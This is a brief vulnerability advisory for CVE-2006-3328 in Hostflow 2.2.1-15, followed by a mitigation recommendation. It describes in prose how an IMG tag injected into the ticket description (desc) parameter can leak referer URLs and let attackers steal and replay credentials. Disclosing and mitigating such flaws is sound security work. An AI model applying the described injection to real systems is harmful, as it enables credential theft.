CVE-2006-3328

Name of the Vulnerable Software and Affected Versions Hostflow version 2.2.1-15

Description The issue allows remote attackers to steal and replay authentication credentials. This is possibly due to a cross-site scripting (XSS) vulnerability or a leak of credentials in referer URLs, where an attacker can use an IMG tag in the desc parameter (Ticket Description field) that points to a URL capturing referer URLs.

Recommendations For Hostflow version 2.2.1-15, avoid using the desc parameter in the new ticket.cgi until a fix is available, and restrict access to the new ticket.cgi to minimize the risk of exploitation.